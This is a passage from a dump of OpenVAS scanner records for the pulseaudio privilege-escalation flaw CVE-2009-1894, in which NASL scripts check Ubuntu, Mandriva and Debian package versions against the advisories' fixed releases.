ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils-dbg\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"pulseaudio-utils\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio\", ver:\"0.9.10-2ubuntu9.4\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-dev\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore9-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore9\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"pulseaudio-module-gconf\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils-dbg\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio\", ver:\"0.9.14-0ubuntu20.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:32", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:152.", "cvss3": {}, "published": 
"2009-07-29T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:152 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:64394", "href": "http://plugins.openvas.org/nasl.php?oid=64394", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_152.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:152 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in pulseaudio:\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered\nthat pulseaudio, when installed setuid root, does not drop privileges\nbefore re-executing itself to achieve immediate bindings. This can\nbe exploited by a user who has write access to any directory on the\nfile system containing /usr/bin to gain local root access. 
The user\nneeds to exploit a race condition related to creating a hard link\n(CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.\n\nAffected: 2008.1, 2009.0, 2009.1\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:152\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:152.\";\n\n \n\nif(description)\n{\n script_id(64394);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:152 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.9~7.3mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsecore5\", rpm:\"libpulsecore5~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n 
report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsecore5\", rpm:\"lib64pulsecore5~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.10~11.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio0\", rpm:\"libpulseaudio0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseaudio-devel\", rpm:\"libpulseaudio-devel~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulseglib20\", rpm:\"libpulseglib20~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpulsezeroconf0\", rpm:\"libpulsezeroconf0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio\", rpm:\"pulseaudio~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-esound-compat\", rpm:\"pulseaudio-esound-compat~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-bluetooth\", rpm:\"pulseaudio-module-bluetooth~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-gconf\", rpm:\"pulseaudio-module-gconf~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-jack\", rpm:\"pulseaudio-module-jack~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-lirc\", rpm:\"pulseaudio-module-lirc~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) 
{\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-x11\", rpm:\"pulseaudio-module-x11~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-module-zeroconf\", rpm:\"pulseaudio-module-zeroconf~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pulseaudio-utils\", rpm:\"pulseaudio-utils~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio0\", rpm:\"lib64pulseaudio0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseaudio-devel\", rpm:\"lib64pulseaudio-devel~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulseglib20\", rpm:\"lib64pulseglib20~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64pulsezeroconf0\", rpm:\"lib64pulsezeroconf0~0.9.15~2.0.6mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:12", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory DSA 1838-1.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1838-1 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64476", "href": "http://plugins.openvas.org/nasl.php?oid=64476", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1838_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1838-1 (pulseaudio)\n#\n# Authors:\n# Thomas Reinke 
<reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Tavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon\ndoes not drop privileges before re-executing itself, enabling local\nattackers to increase their privileges.\n\nThe old stable distribution (etch) is not affected by this issue.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.10-3+lenny1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your pulseaudio packages.\";\ntag_summary = \"The remote host is missing an update to pulseaudio\nannounced via advisory DSA 1838-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201838-1\";\n\n\nif(description)\n{\n script_id(64476);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n 
script_cve_id(\"CVE-2009-1894\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1838-1 (pulseaudio)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulsecore5-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-jack\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc\", 
ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-hal\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-lirc-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-mainloop-glib0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-esound-compat-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-x11-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-browse0\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse0-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-utils\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-zeroconf-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpulse-dev\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-gconf\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"libpulsecore5\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-module-jack-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pulseaudio-dbg\", ver:\"0.9.10-3+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:35", "description": "The remote host is missing an update to pulseaudio\nannounced via advisory MDVSA-2009:152.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:152 (pulseaudio)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064394", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064394", "sourceData": "# 